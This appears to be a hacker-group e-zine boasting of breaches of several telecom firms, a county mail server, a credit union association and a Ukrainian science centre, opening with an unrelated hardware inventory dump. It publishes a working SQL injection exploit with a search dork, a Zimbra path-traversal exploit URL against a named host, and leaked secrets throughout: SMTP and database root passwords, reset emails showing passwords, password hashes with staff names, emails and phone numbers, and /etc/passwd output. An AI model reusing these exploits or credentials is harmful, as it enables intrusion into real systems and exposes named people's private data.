43538298151351DB55105350CFE375BB77B8BBCF4D312B4729255050AECE4D32034B7CB9C95378384D33BC71D02ED0AEBB764D34E3E258C1A1CF2BEF *VK ipzSeries *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C4 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A1419 *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C6 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A152F *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C9 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AD *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS Memory DIMM *YL U789F.001.AAA8848-P1-C11 *RT VINI *FG XXMS *CC 312B *SN YH10MS6A14AE *PN 12R8255 *FN 12R8255 *SZ 1024 *VK RS6K *FC ******** *DS CEC OP PANEL *YL U789F.001.AAA8848-D1 *RT VINI *FG XXOP *CC 28A0 *SN YL10W819500T *FN 42R5377 *PN 10N9973 *HE 0001 *CT 40B50000 *HW 0001 *B3 000000000000 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS Voltage Reg *YL U789F.001.AAA8848-P1-C3 *RT VINI *FG XXRG *CC 6B16 *FN 24R2697 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E1 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0076 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS A IBM AC PS *YL U789F.001.AAA8848-E2 *RT VINI *FG XXPS *CC 51BC *SN YL10286B0257 *PN 39J5045 *FN 39J5045 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A1 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A2 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A3 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS IBM Air Mover *YL U789F.001.AAA8848-A4 *RT VINI *FG XXAM *CC 6B17 *FN 97P5993 *VK RS6K *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C12 *RT VINI *FG XXIB *CC 271F *SN YL10W817803E *FN 03N6843 *PN 03N6843 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS PCI BRIDGE *YL U789F.001.AAA8848-P1-C13 *RT VINI *FG XXIB *CC 276F *SN YL10W8192046 *FN 03N6846 *PN 03N6846 *HE 0001 *CT 30F10005 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS System Firmware *YL U9115.505.06458FA-Y1 *CL Phyp_1 15532009040980A00701 *CL PFW 17152009030681CF0681 *CL FSP_Ker 16582009042181E00100 *CL FSP_Fil 16582009042181E00101 *CL FipS_BU 16582009042181E00200 *CL SMA 11392005070781E00500 *CL SPCN3 124620060531A0E00A11 *CL SPCN1 091620040823A0E00D00 *CL SPCN2 125920060628A0E00D20 *MI SF240_382 SF240_358 SF240_382 *FC ======== *DS IDE DVD-ROM Drive *AX cd0 *PL 05-08-00 *MF IBM *TM DROM0020561 *RL DA31 *Z0 058002028F000010 *YL U789F.001.AAA8848-P1-D3 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk0 *PL 06-08-01-5,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED3D *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L5-L0 *FC ======== *DS 16 Bit LVD SCSI Disk Drive *AX hdisk1 *PL 06-08-01-8,0 *MF IBM H0 *TM ST373455LC *FN 03N6347 *RL 43383038 *SN 0004ED39 *EC D76038 *PN 03N6346 *Z0 000004129F000136 *Z1 0913C808 *Z2 0002 *Z3 07301 *Z4 0001 *Z5 22 *Z6 D76038 *BR H0 *YL U789F.001.AAA8848-P1-T9-L8-L0 *FC ======== *DS SCSI Enclosure Services Device *AX ses0 *PL 06-08-01-15,0 *MF IBM *TM VSBPD2E1 U4SCSI *RL 6781 *SN W8224009 *Z0 0D0002022F004000 *FN 10N6781 *FL P1 *FS 789F-001 AAA8848 *YL U789F.001.AAA8848-P1-T9-L15-L0 *YL U789F.001.AAA8848-P1-T9-L15-L0
█ █ █ █ █ ███ █████
███ █ █ █ █ █ █
██ █ ██ █ █████ █
██ █ █ █ █ █ █ ████
███████ █ █ ███ █ █ █
██ █
██ █ █████
Klass Telecom, I know the majority of you have not heard of this Telecommunications company.. however; the reason in which we hacked them is here:
On their website:
Engineering is the heart of Klas Telecom.
With over 80% of the company’s employment dedicated to engineering, design, research and development, Klas Telecom is able to stay on the forefront of the tactical communications solutions market.
Our expert engineers work ceaselessly to solve the unique challenges of communicating securely in military and other austere environments.
They ensure that our products take advantage of emerging technology while having their base in industry standards.
Founded in 1991, Klas Telecom has been developing connectivity equipment for U.S. and international federal governments for over 22 years.
On their twitter:
Klas Telecom, founded in 1991, has been providing integrated, secure tactical communications solutions to the Department of Defense for over 12 years.
As it says, they have been developing communication means for the U.S. And International Govt..
Whelp, #FuckTheSystem.
Klas Telecom had a legacy helpdesk set-up that was suppose to be limited through the .htaccess to their own ip range.
They didn't rewrite certain things as variables in the .htaccess file; allowing everyone to view this server outside the range on the move.
Well, we had a little Error based SQL injection 0day on helpdesk pilot just sitting around; one day, we decided to do a skim through the dork.
One of the first things to pop up was a website called grrip.net; so, we examined it, and exploited it propperly.
P.S: Here's the 0day, don't really need it anymore; so releasing it to the public, it's how we accessed their email.
# Exploit Title: Help Desk Pilot 4.4.5 Error-based SQL Injection
# Google Dork: "knowledgebase.php?act=artattach&att_id"
# Date: 3/15/2013
# Exploit Author: NullCrew
# Vendor Homepage: http://www.twitter.com/NullCrew_FTS
# Software Link: http://www.helpdeskpilot.com/
# Version: Help Desk Pilot 4.4.5
# Tested on: Windows, Linux
An error based SQL Injection vulnerability lies in the knowledgebase's $_GET['att_id'] of $_GET['artattach'].
The syntax of the vulnerability is as basic as it gets.
The database contains mail information in the "config" table, so you might want to check that out.
EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337'
EXAMPLE: 127.0.0.1/knowledgebase.php?act=artattach&att_id=31337 or 1 group by concat(version(),floor(rand()*2)) having min(NULL) or 1--
Any questions can be sent to: twitter.com/NullCrew_FTS
-------------------------------------------------------
Now, onto Klas's email:
---Email-------------------------------
SMTP Port: 465
SMTP Host: smtp.gmail.com
SMTP Username: helpdesk@klasonline.com
SMTP Password: Ax4JD%4Ks
---End Email---------------------------
Alright, so, our next step was decrypting the passwords; Whelp, this was taking to long.
Considering we had access to the support desks smtp services..
We were able to easily just go to request a new password, and boom; we had access.
(Proof.)
Return-Path: <helpdesk@klasonline.com>
Received: from grrip.net ([67.192.46.6])
by mx.google.com with ESMTPSA id fj1sm4935014oeb.5.2014.04.02.00.01.11
for <frank_murray@eircom.net>
(version=TLSv1 cipher=RC4-SHA bits=128/128);
Wed, 02 Apr 2014 00:01:12 -0700 (PDT)
Date: Wed, 2 Apr 2014 02:01:11 -0500
Return-Path: helpdesk@klasonline.com
To: frank_murray@eircom.net
From: helpdesk@klasonline.com
Reply-To: helpdesk@klasonline.com
Subject: Your password: Login information
Message-ID: <bc15042d8360f4a153b9274e76df627e@grrip.net>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="ISO-8859-1"
Dear Frank (No name for you.)
We received a request to reset and send your password to your email.
Your password is ZTYXJDUT .
Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .
Regards,
Admin
(Another, for proof; Military email.)
Return-Path: <helpdesk@klasonline.com>
Received: from grrip.net ([67.192.46.6])
by mx.google.com with ESMTPSA id wy2sm2014265obc.21.2014.04.02.00.13.24
for <joshua.skidmore@afghan.swa.army.mil>
(version=TLSv1 cipher=RC4-SHA bits=128/128);
Wed, 02 Apr 2014 00:13:24 -0700 (PDT)
Date: Wed, 2 Apr 2014 02:13:24 -0500
Return-Path: helpdesk@klasonline.com
To: joshua.skidmore@afghan.swa.army.mil
From: helpdesk@klasonline.com
Reply-To: helpdesk@klasonline.com
Subject: Your password: Login information
Message-ID: <8d57477fbbe85032a3422537a68f220f@grrip.net>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version 2.0.2]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="ISO-8859-1"
Dear (No more info for you.)
We received a request to reset and send your password to your email.
Your password is VAFYVPIH .
Use your email address and password to login to help desk interface: http://www.grrip.netindex.php .
Regards,
Admin
On a side note, Klas Telecom played things smart; Their IT @cros13 was contacted after our tweet.
They observed the servers and noticed that we have indeed achieved access; We had a conversation with this IT.
He is the most sensibile IT that we have come across, with that we'd like to give a special shout-out to the fella, good-job, mate.
█████ █
█ ███ ██ █ ████ ███ ████ ██ █ ████
██████ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ ██████ █ █ █ ██████
█████ █ █ █ █ █ █ █ █ █ █ █ █ █ █
███ █ ██ ████ ███ █ █ █ ██ █ █
█
mail.tiptoncounty.In.gov - Alright, much like Comcast, and Al Arabiya; (With the exception of less servers.)
Coming to the realization that it was running on Zimbra, and that even Comcast didn't patch..
We decided to attempt to pull the usual LDAP and MySQL information from localconfig.xml.. It worked.
Exploit URL (Nab it while it's hot.): http://mail.tiptoncounty.in.gov/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
ldap port:
a["<key"]="name=\"ldap_port\">";
a["<value>389</value>"]="";
Zimbra User:
a["<key"]="name=\"zimbra_user\">";
a["<value>zimbra</value>"]="";
Zimbra ldap:
a["<key"]="name=\"zimbra_ldap_password\">";
a["<value>uL3xmqJwm</value>"]=""
Amavis:
a["<key"]="name=\"ldap_amavis_password\">";
a["<value>uL3xmqJwm</value>"]="";
Truststore:
a["<key"]="name=\"mailboxd_truststore_password\">";
a["<value>changeit</value>"]="";
Keystore:
a["<key"]="name=\"mailboxd_keystore_password\">";
a["<value>cy2jaP5jT</value>"]="";
Zimbra MySQL:
a["<key"]="name=\"zimbra_mysql_password\">";
a["<value>NgrfUQjZH4oTpW4rF7QR6N7jHwM0QGbH</value>"]="";
MySQL root password:
a["<key"]="name=\"mysql_root_password\">";
a["<value>NKrQYWwmI8mcUKdrG0NSr7gqrQBlnun</value>"]="";
ldap postfix:
a["<key"]="name=\"ldap_postfix_password\">";
a["<value>uL3xmqJwm</value>"]="";
ldap replication:
a["<key"]="name=\"ldap_replication_password\">";
a["<value>uL3xmqJwm</value>"]="";
ldap ngix:
a["<key"]="name=\"ldap_nginx_password\">";
a["<value>uL3xmqJwm</value>"]="";
ldap root password:
a["<key"]="name=\"ldap_root_password\">";
a["<value>uL3xmqJwm</value>"]="";
etc/passwd/:
a.root="x:0:0:root:/root:/bin/bash";
a.daemon="x:1:1:daemon:/usr/sbin:/bin/sh";
a.bin="x:2:2:bin:/bin:/bin/sh";
a.sys="x:3:3:sys:/dev:/bin/sh";
a.sync="x:4:65534:sync:/bin:/bin/sync";
a.games="x:5:60:games:/usr/games:/bin/sh";
a.man="x:6:12:man:/var/cache/man:/bin/sh";
a.lp="x:7:7:lp:/var/spool/lpd:/bin/sh";
a.mail="x:8:8:mail:/var/mail:/bin/sh";
a.news="x:9:9:news:/var/spool/news:/bin/sh";
a.proxy="x:13:13:proxy:/bin:/bin/sh";
a["www-data"]="x:33:33:www-data:/var/www:/bin/sh";
a.backup="x:34:34:backup:/var/backups:/bin/sh";
a.list="x:38:38:Mailing List Manager:/var/list:/bin/sh";
a.irc="x:39:39:ircd:/var/run/ircd:/bin/sh";
a.gnats="x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh";
a.nobody="x:65534:65534:nobody:/nonexistent:/bin/sh";
a.libuuid="x:100:101::/var/lib/libuuid:/bin/sh";
a.dhcp="x:101:102::/nonexistent:/bin/false";
a.syslog="x:102:103::/home/syslog:/bin/false";
a.klog="x:103:104::/home/klog:/bin/false";
a.bind="x:104:111::/var/cache/bind:/bin/false";
a.sshd="x:105:65534::/var/run/sshd:/usr/sbin/nologin";
a.dave="x:1000:1000:Dave,,,:/home/dave:/bin/bash";
a.zimbra="x:1001:1001::/opt/zimbra:/bin/bash";
a.postfix="x:1002:1002::/opt/zimbra/postfix:/bin/sh";
a.clamav="x:106:115::/var/lib/clamav:/bin/false";
█████ █ ███████ ██████ █ ███████ ███████
██ █ █ █ █ █ █ █
█ █ █ █ █ █ █
█ ████ █ █████ █ █ █ █ & BATM
██ ██ █ █ █ █ █ █
█ ██ █ █ █ █ █ █
██ █ █ ██████ ██████ ███████ ███████
██ █
████ █
Founded in 1972 and based in Mansfield, Massachusetts, Telco Systems designs, develops and markets edge telecom network solutions which enable service providers to create an intelligent end-to-end Carrier Ethernet/MPLS network.
Telco Systems solutions focused around four primary vertical markets - carrier cloud networking and cloud services, business Ethernet services, mobile backhaul [1] and AdvancedTCA (ATCA) switching blades.
Sorry guise, but, as this e-zine is obviously proving? You all fucking suck, heavily; At most things.
Especially securing your system, which as a company providing these types of things? It should be secured, and constantly patched.
But, nooooooo, go figure; you guise suck, and this is what happens when the aliens of NC drop by to pay ya a visit!
Let's see here, it couldn't be that all your backups are belong to us, or anything, right?
When you download the contents below at the end of the zine; you will be downloading three sql dbs from telco as well.
Proof before download:
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
('1', 'admin', '$P$BLkCcV81SBWzPRWAeH7HPrR363nJEt.', 'admin', 'mzabaruk@telco.com', 'http://www.telco.com', '2012-02-13 17:04:28', '', '0', 'Masha Zabaruk')
,('3', 'Nir Halachmi', '$P$Blg3v43rX0BhNeOdi2P7CwppiEa6ay0', 'nir-halachmi', 'marketing@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Nir Halachmi')
,('4', 'Irit Gillath', '$P$BbXlrDdc7dWRW.1IJ9FnaF1HCsvRm50', 'irit-gillath', 'igillath@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Irit Gillath')
,('5', 'Aviv Miller', '$P$BdtfN80AaBQe/dC7NE6LdTzplypyh./', 'aviv-miller', 'amiller@telco.com', '', '2012-02-13 17:10:29', '', '0', 'Aviv Miller')
,('12', 'ggum', '$P$B8sAOSjrXs0GzZsJuquhsh.XUd2qEJ1', 'ggum', 'ggum@gum.com', '', '2013-01-30 04:26:20', '', '0', 'Greg Gum')
,('7', 'motin', '$P$Bw3zlfRilcDRFNtQL80OJOGPRBQY5f.', 'motin', 'motin@telco.com', 'http://www.telco.com', '2013-01-25 18:02:35', '', '0', 'Moti Nisim')
,('14', 'moshe-shimon', '$P$BnoP504/znW8JF37wnMU6OZdE1Lbam.', 'moshe-shimon', 'moshes@telco.com', 'http://www.telco.com', '2013-01-30 18:00:42', '', '0', 'Moshe Shimon')
,('15', 'taylor-salman', '$P$B.Rp3ZEMeiVk5QIlSPXc3KCMvD2dF6/', 'taylor-salman', 'tsalman@telco.com', 'http://www.telco.com', '2013-01-30 18:02:12', '', '0', 'Taylor Salman');
INSERT INTO `operators` (`opID`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opAutologout`, `active`) VALUES
('1', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', 'blake@codium.biz', '1', '0', '1')
,('2', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '582a2631523e07b219826a048be997ca2c6773c7', '', 'Telco Systems USA', '', '', 'mzabaruk@telco.com', '1', '0', '1')
,('3', '2012-10-23 12:54:49', 'Vicki Kobza', 'vicki', '923040f705b4ddfbbaee2ca2024409b4fdf1cf76', '', 'Telco Systems', '', '', '', '1', '0', '0');
INSERT INTO `operators` (`opID`, `opSupportAdmin`, `refwhen`, `opName`, `opUsername`, `opPassword`, `opIP`, `opCompany`, `opDesc`, `opPhone`, `opEmail`, `opRole`, `opZones`, `opAutologout`, `creator`, `active`) VALUES
('1', '0', '0000-00-00 00:00:00', 'Nikolay Hristov', 'blake', '962da309e5db8119b6bda644ec7b1aa0043435b8', '', 'Alienlab', 'Web Developer', '+359 888 893824', 'blake@telco.com', '1', '', '0', '1', '1')
,('2', '0', '2012-01-13 09:05:55', 'Masha Zabaruk', 'masha', '75e000964285acd468ed63c2bf09f10c0e1d6bab', '', 'Telco Systems USA', '', '', 'mzabaruk@telco.com', '1', '', '0', '1', '1')
,('10', '0', '2012-11-28 09:40:21', 'Tester Tester', 'tester', '399e34b6bd6610702d655a5e8654e7b207dbd1ef', '', '', '', '', '', '1', '', '0', '1', '1')
,('4', '1', '2012-05-14 11:16:32', 'Momchil Boychev', 'momchil', '3025b2294d44426f4c3b7721103c613352148d4f', '', 'Telco Systems BG', '', '', 'momchil@telco.com', '2', '�1�3�4�5�6�7�8�', '0', '1', '1')
,('5', '0', '2012-08-09 01:42:55', 'Irit Gillath', 'irit', '864d7f6d52e1b7084ccdfe7504aa280510ea8a75', '', '', '', '', '', '2', '', '0', '1', '1')
,('6', '1', '2012-08-27 09:08:03', 'Yoni Nabedrick', 'Yoni', '88a638243d2b7241c9115e2ae6bb5fd250ae8037', '', 'Telco Systems IL', 'PS Engineer', '', '', '2', '�1�4�', '0', '3', '1')
,('7', '1', '2012-09-03 07:04:36', 'Yossi Gilany', 'ygilany', '2c47e236d897ff313dd6d8024ae18b3405ff1167', '', 'Telco Systems IL', 'PS Director', '', 'ygilany@batm.co.il', '2', '�1�3�4�5�6�7�8�', '0', '3', '1')
,('8', '1', '2012-09-03 07:08:02', 'Zwi Walerstein', 'ZwiW', '7be4402c10847923e7998b4b5c5cd29747b4a695', '', 'Telco Systems IL', 'GM', '', '', '2', '�1�3�4�', '0', '7', '0')
,('9', '1', '2012-09-19 10:18:53', 'Telco marketing', 'telco', 'c0533c6c1e9e60e75b2de0719c075a51d83a7b54', '', '', '', '', '', '2', '�1�2�3�', '0', '1', '1')
,('13', '1', '2012-12-18 10:35:59', 'Telco PLM Test admin', 'plm', 'fde1150d18147d27c90148ed6bff32d7faf4c318', '', 'Telco Systems', '', '', '', '2', '�1�3�4�5�6�7�8�', '0', '1', '1')
,('14', '1', '2013-01-07 15:06:15', 'Smita Pande', 'spande', '632f92623a3c512d7ef7a01698dca536f85b39ff', '', 'Telco Systems', 'Professional Services Engineer', '', 'spande@telco.com', '2', '�1�2�3�4�5�6�7�8�', '0', '2', '1')
,('15', '1', '2013-01-07 15:18:46', 'Deyan Dichev', 'ddichev', 'f89a3539c1466c3154719b765b3ca051cb638633', '', '', 'PS Engineer', '+1 781 255 2550', 'ddichev@telco.com', '2', '�1�2�3�4�5�6�7�8�', '0', '2', '1')
,('16', '1', '2013-01-07 15:46:18', 'Jeffrey Richard', 'jrichard', 'ea2a827dd822a188bf2cbc8fa4eef14ec595d870', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-2495', 'jrichard@telco.com', '2', '�1�2�3�4�5�6�7�8�', '0', '2', '1')
,('19', '0', '2013-01-08 04:13:06', 'Daniela Dankova', 'dani', 'c1de93ce16028a61f4e71c3430e911f82c23e0ca', '', 'Telco Systems BG', 'Tech Writer', '', 'daniela@telco.com', '1', '', '0', '1', '1')
,('25', '1', '2013-01-17 09:27:34', 'INSIDE SALES', 'inside_sale', '936215472726262a68bb1652b3b794b23763b63f', '', 'TELCO SYSTEMS', 'This is for Gale & Erin for Inside Sales', '', 'sales@telco.com', '3', '�1�2�', '0', '14', '1')
,('18', '1', '2013-01-07 16:43:50', 'Dave Lee', 'dlee', '35462c4fc4f343a1c2cfb13b6a08132cb6aae231', '', 'Telco Legacy Division', 'V.P. Business Development', '', 'dlee@telco.com', '2', '�1�2�3�4�5�6�7�8�', '0', '2', '1')
,('20', '1', '2013-01-08 04:23:04', 'Nadine Dove', 'nadine', '9e6939b5e640b29edf543064fef1fff40062a11c', '', 'Telco Systems IL', '', '', 'nadine.d@telco.com', '2', '�1�', '0', '1', '1')
,('21', '1', '2013-01-08 04:25:11', 'Moshe Haimov', 'haimov', 'f7d8131aba4ddccb62722702762f0d11eafd3b31', '', 'Telco Systems IL', '', '', 'mosheh@telco.com', '2', '�1�', '0', '1', '1')
,('32', '1', '2013-02-01 08:46:13', 'Gast?n Cutignola', 'gcutignola', '', '', 'Telco Systems', 'SE, Latin America\r\n\r\nPassword - access4telco', '', 'gcutignola@telco.com', '3', '�1�2�3�4�5�6�7�8�', '0', '15', '1')
,('24', '1', '2013-01-11 10:24:56', 'Blake Test', 'blaketest', '6e5e5df8d1574e60a976d8e5551879eaa35dd1a2', '', '', '', '', '', '2', '�1�3�4�5�6�7�8�', '0', '19', '1')
,('23', '1', '2013-01-10 12:14:53', 'Paul Schilling', 'pschilling', '366feae8e049672053e0428ae85506243068b148', '', 'Telco Legacy Division', 'Technical Support Engineer\r\nTelco Legacy Division', '781-255-5214', 'pschilling@telco.com', '2', '�1�2�', '0', '17', '1')
,('26', '1', '2013-01-24 06:51:05', 'Markus Pestinger', 'markus', 'cd01a82a5a2fa78f71bdb1b454a403fcf14f8244', '', 'Telco Systems', 'SE EMEA', '', '', '3', '�1�2�3�4�5�6�7�8�', '0', '19', '1')
,('27', '1', '2013-01-24 06:53:20', 'Derek Wang', 'derek', '41284decb53556cf2919383e0b073ce0fcace300', '', 'Telco Systems', 'SE APAC', '', '', '3', '�1�2�3�4�5�6�7�8�', '0', '19', '1')
,('28', '1', '2013-01-24 06:55:57', 'Daniel Bravarnik', 'daniel', 'daaaa0e7471062a330ceb2ec876c418807fd927c', '', 'Telco Systems', 'SE North America', '', '', '3', '�1�2�3�4�5�6�7�8�', '0', '19', '1')
,('33', '1', '2013-02-04 15:20:23', 'Bob St. Hilaire', 'bobsthilaire', 'bdd761f29af1f28fc9b2c487f1d7df0d5b345f82', '', 'Telco Systems', 'Operations.', '781-255-2291', 'bsthilaire@telco.com', '3', '�1�2�', '0', '15', '1')
,('30', '1', '2013-01-24 07:01:55', 'Pasquale Tagliarini', 'pasquale', '5769965bd169aac9c3da65d5630278785460880f', '', 'Telco Systems', 'SE North America', '', '', '3', '�1�2�3�4�5�6�7�8�', '0', '19', '1')
,('31', '1', '2013-01-24 07:02:53', 'Salah Chaou', 'salah', 'e35a40146c853b582f5ba1849d5183602fa3c58f', '', 'Telco Systems', 'SE North America', '', '', '3', '�1�2�3�4�5�6�7�8�', '0', '19', '1')
,('34', '1', '2013-02-04 17:39:45', 'Telco Inside sales', 'telco_insidesale', '3d2c209c673d1d29d21d3dec5bb65e562ee907cb', '', 'Telco Systems', 'Used for inside sales by Gail and Erin', '', '', '3', '�1�2�', '0', '15', '1')
,('35', '0', '2013-02-07 10:56:29', 'Meira Shitrit', 'meira', '7f371cf75994b38200ed90c9aa867bcad4aa4166', '', 'Telco Systems', 'Quality Assurance Manager', '', 'meiraz@telco.com', '2', '', '0', '2', '1')
,('36', '1', '2013-02-12 06:56:47', 'Moshe Digmal', 'mdigmal', 'ee65fd9303075a30217663367ee54a9daaf62e54', '', 'Telco', '', '', 'mdigmal@telco.com', '3', '�1�3�4�5�6�7�8�', '0', '1', '1')
,('37', '1', '2013-03-04 03:06:09', 'Meira Zitelbach Shitrit', 'meiraz', '006b3ed87b75ab8dcadf089e7b5a5d6d1d4cab10', '', 'Telco Systems IL', '', '', '', '2', '�1�3�4�5�6�7�8�', '0', '1', '1');
BOUSBONUSBONUSBONUSBONUS!
oKAY, WE GET IT; WHAT THE FUCK DO YOU WANT!?
BATM, GIMME THEIR SHIT PL0X!
You mean the company that owns Telco Systems?
YES, YOU GIMME THAT SHIT; NOW!
You're in luck, they're vulnerable to the same thing!
OM NOM NOM NOM NOM NOM NOM NOM NOM
OM NOM NOM NOM NOM NOM NOM NOM NOM
BATM OPERATORS:
blake:962da309e5db8119b6bda644ec7b1aa0043435b8:Nikolay Hristov:+359 888 893824
maria:da1a1dee1cf51e12e41346dde66761a1e0c63223:Maria Nissan
masha:582a2631523e07b219826a048be997ca2c6773c7:Masha Zabaruk
█████ █ █████ ████ █████ █████ ████ █████ ████ █ ████ ███ █████ █ █████ ███████ █ █ ████ █████ ████ ████
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ ██████ █ █ █ █ █ █ ██████ █ █ █ ████ ███ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █████ ████ █ █ █ █ ████ ████ █ █████ ███ █████ █ █████ █ █ █████ ████ █ █
Yes, you read it right; and the funniest part about it? It was a simple hack, sql injection:
See for yourself: http://www.creditunion.coop/news/story.php?id=64362
Now, of course; This doesn't mean we jacked any cash, or changed anyones credit scores..
But it does show that simplicity goes a far way; now, here is a sample of the type of data in the download for it:
WP-USERS
username, password, email, activation key.
admin:$P$93jtG7JJBnfik1bFn2k.kZnjNajan71:kknope@cuna.com:X#%2)WrzV&lv
dklavitter:$P$9N6xDuhX39BXu1tMArNjBNJUZaVT2z1:dklavitter@cuna.com:D6V5z%**F$jb
CMS
name, pass, mail, access, login
kevink@cuna.org:f3ca0f3d5e820fe1d583a0d2208f5faf:kevink@cuna.org:1290442727:1290442338
chill@cuna.coop:e66c39419b0b20ea68efbb4da1a56b25:chill@cuna.com:1363092146:1363091481
balderson:2eef47909b32eaef01cb90d365c7d185:balderson@cuna.com:1360090372:1360090123
pkeefe@cuna.com:161ebd7d45089b3446ee4e0d86dbcf92:pkeefe@cuna.coop:1287568255:1287567724
cgrabow@cuna.coop:b43190eb1b7f95cff61014b5d1480ee5:cgrabow@cuna.coop:1363043662:1363042929
fabbott@cuna.coop:1c8e3b2667c775961b06e5c023a30cea:fabbott@cuna.coop:1341492658:1341492658
lduval@cuna.coop:161ebd7d45089b3446ee4e0d86dbcf92:lduval@cuna.coop:1288308848:1288308590
jharvey@cuna.coop:c4a83adf116cc666d9d544ad05f5f14e:jharvey@cuna.coop:1351169586:1350935156
█████ █ ████ ███████ ████ █ █
█ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █
███ ████ █ █ █ █ - Science and Technology center in Ukraine.
█ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █
█████ █ ████ █ ████ ███
Well now, this one was interesting; The Science and Technology Center in Ukraine?
First thing is first, they claimed that they weren't logging user ip-addresses, or other things.
So, naturally, we decided to look into the claim and began goofing around.
By the time we came across an exploit in stcu.int, we managed to obtain something interesting.. their smtp configuration:
SMTP configuration:
function authgMail($from, $namefrom, $to, $nameto, $subject, $message, $custom_header = "")
{
/* your configuration here */
//$smtpServer = "sslv3://smtp.gmail.com";
//does not accept STARTTLS
$smtpServer = "tls://smtp.gmail.com";
//does not accept STARTTLS
$port = "465"; // try 587 if this fails
$timeout = "60";
//typical timeout. try 45 for slow servers
$username = "webmaster@stcu.int";
//your gmail account
$password = "G46572";
//the pass for your gmail
//$password = "NetskY";
$localhost = $_SERVER['REMOTE_ADDR'];
//requires a real ip
$newLine = "\r\n"; //var just for newlines
From the email, we were able to reset the passwords of accounts belonging to the STCU & Funding parties project management login
Return-Path: <webmaster@stcu.int>
Received: from [212.109.57.173] (xserve.stcu.int. [212.109.57.173])
by mx.google.com with SMTP id 45sm17755596eeh.9.2014.04.11.06.38.21
for <tdibragimov@mail.ru>
(version=TLSv1 cipher=RC4-SHA bits=128/128);
Fri, 11 Apr 2014 06:38:22 -0700 (PDT)
Return-Path: <webmaster@stcu.int>
To: tdibragimov@mail.ru
From: STCU Webmaster <webmaster@stcu.int>
Reply-To: STCU Webmaster <webmaster@stcu.int>
Subject: New Password
Date: Fri, 11 Apr 2014 16:40:32 +0300
X-LibVersion: 3.3.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="_=_swift-13602789785347f0d0df28b2.21080339_=_"
Content-Transfer-Encoding: 7bit
Message-ID: <20140411134032.2316.1903919572.swift@www.stcu.int>
This is a message in multipart MIME format. Your mail client should not
be displaying this. Consider upgrading your mail client to view this
message correctly.
--_=_swift-13602789785347f0d0df28b2.21080339_=_
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN">
<html>
<head><title>New Password</title></head>
<body>
<p>First Name: Tahir</p>
<p>Last Name: Ibragimov</p>
<p>Your new password is "8N9cKVMK".
But if you wish you can change it: use this new password to sign in. Then click on "Edit Info". Here you can generate new pass.</p>
cat /etc/passwd
nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
